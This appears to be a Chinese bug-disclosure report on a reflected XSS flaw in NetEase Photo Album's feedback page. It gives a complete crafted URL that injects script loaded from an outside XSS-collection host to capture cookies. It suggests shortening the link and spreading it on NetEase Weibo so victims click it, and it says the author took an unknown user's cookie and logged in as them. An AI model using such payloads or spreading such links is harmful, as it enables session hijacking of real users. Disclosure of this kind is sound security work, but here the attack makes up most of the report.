网易相册反射型xss，可拿用户cookie（含有结果和

网易相册用户意见反馈存在反射型xss，可轻易拿到用户cookie。

前面提交了，剑总说没有证明案例，特此提交。。。囧

1、在网易相册用户意见反馈存处，提问问题，然后访问自己得问题，此处未对用户的提问内容进行任何过滤，导致存在xss。

 

构造url如下：http://fankui.163测试数据/ft/question.fb?pid=3&cid=33518918&type=0&pno=1%22%3E%3Cimg%20src=1%20onerror=%22alert%28/xss/%29%22%3E%3Cscript%20src=http://xss.tw/762%3Ealert%281%29%3C/script%3E

 

此处存在两处xss，出发点，从页面源代码中也可以看出来

 

 

2、由于构造的url太长，可以使用shorten url：

 

http://goo.gl/RW5AQ

将此url发到网易微博或者其他交互量大的地方，只要受害者点击url就能触发xss，拿到受害者的网易cookie。

 

 

不知道这是哪个用户，拿到其cookie，登陆如下：

 

 

修复方案： 过滤！ 

 

查看更多关于网易相册反射型xss，可拿用户cookie（含有结果和的详细内容...